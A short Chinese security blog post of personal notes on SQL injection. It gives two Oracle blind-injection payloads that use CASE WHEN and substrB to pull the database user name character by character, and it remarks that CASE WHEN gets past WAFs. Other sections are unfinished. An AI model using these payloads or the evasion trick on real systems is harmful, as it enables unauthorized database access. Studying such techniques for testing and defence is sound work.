GKSEC

SQL注入学习心得

Oracle

⠀⠀最近有机会接触到大型系统,与WAF斗智斗勇,基本都是Oracle盲注,挖了几个SQL注入的漏洞还是记录一下,所以写个文章长期记录。

盲注

zhangwe'||case+when+substrB(user,1,1)='W'+then'i'else'xx'end||
%CE%CA%CC%E2'and case when substrB(user,5,1)='3' then 'd' end like'd

⠀⠀case when语句基本能过WAF

报错注入

⠀⠀等待更新

Mysql

等待更新

当前页面是本站的「Google AMP」版。查看和发表评论请点击:完整版 »